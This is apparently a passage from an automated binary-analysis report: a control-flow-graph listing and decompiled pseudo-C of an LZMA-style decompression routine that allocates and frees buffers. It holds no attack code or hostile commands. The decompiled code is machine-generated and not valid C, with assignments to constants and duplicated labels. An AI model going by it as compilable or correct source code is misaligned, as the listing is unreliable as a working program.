                      control_flow_graph 618 406481-406487 619 406489-40648b 618->619 620 40648c-4064aa 618->620 619->620 621 4066b8-4066cd 620->621 622 40677d-40678a 620->622 623 4066e7-4066fd 621->623 624 4066cf-4066e5 621->624 625 4067b4-4067b8 622->625 626 406700-406707 623->626 624->626 627 406818-40682b 625->627 628 4067ba-4067db 625->628 631 406709-40670d 626->631 632 40672e 626->632 633 406734-40673a 627->633 629 4067f4-406807 628->629 630 4067dd-4067f2 628->630 634 40680a-406811 629->634 630->634 635 406713-40672b 631->635 636 4068bc-4068c6 631->636 632->633 641 4068e7 633->641 642 405edf 633->642 638 4067b1 634->638 639 406813 634->639 635->632 640 4068d2-4068e5 636->640 638->625 654 406796-4067ae 639->654 655 4068c8 639->655 643 4068ea-4068ee 640->643 641->643 645 405ee6-405eea 642->645 646 406026-406047 642->646 647 405f8b-405f8f 642->647 648 405ffb-405fff 642->648 645->640 651 405ef0-405efd 645->651 646->621 649 405f95-405fae 647->649 650 40683b-406845 647->650 652 406005-406019 648->652 653 40684a-406854 648->653 656 405fb1-405fb5 649->656 650->640 651->641 657 405f03-405f49 651->657 658 40601c-406024 652->658 653->640 654->638 655->640 656->647 659 405fb7-405fbd 656->659 660 405f71-405f73 657->660 661 405f4b-405f4f 657->661 658->646 658->648 662 405fe7-405ff9 659->662 663 405fbf-405fc6 659->663 666 405f81-405f89 660->666 667 405f75-405f7f 660->667 664 405f51-405f54 GlobalFree 661->664 665 405f5a-405f68 GlobalAlloc 661->665 662->658 668 405fd1-405fe1 GlobalAlloc 663->668 669 405fc8-405fcb GlobalFree 663->669 664->665 665->641 670 405f6e 665->670 666->656 667->666 667->667 668->641 668->662 669->668 670->660
                      C-Code - Quality: 99%
                      			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
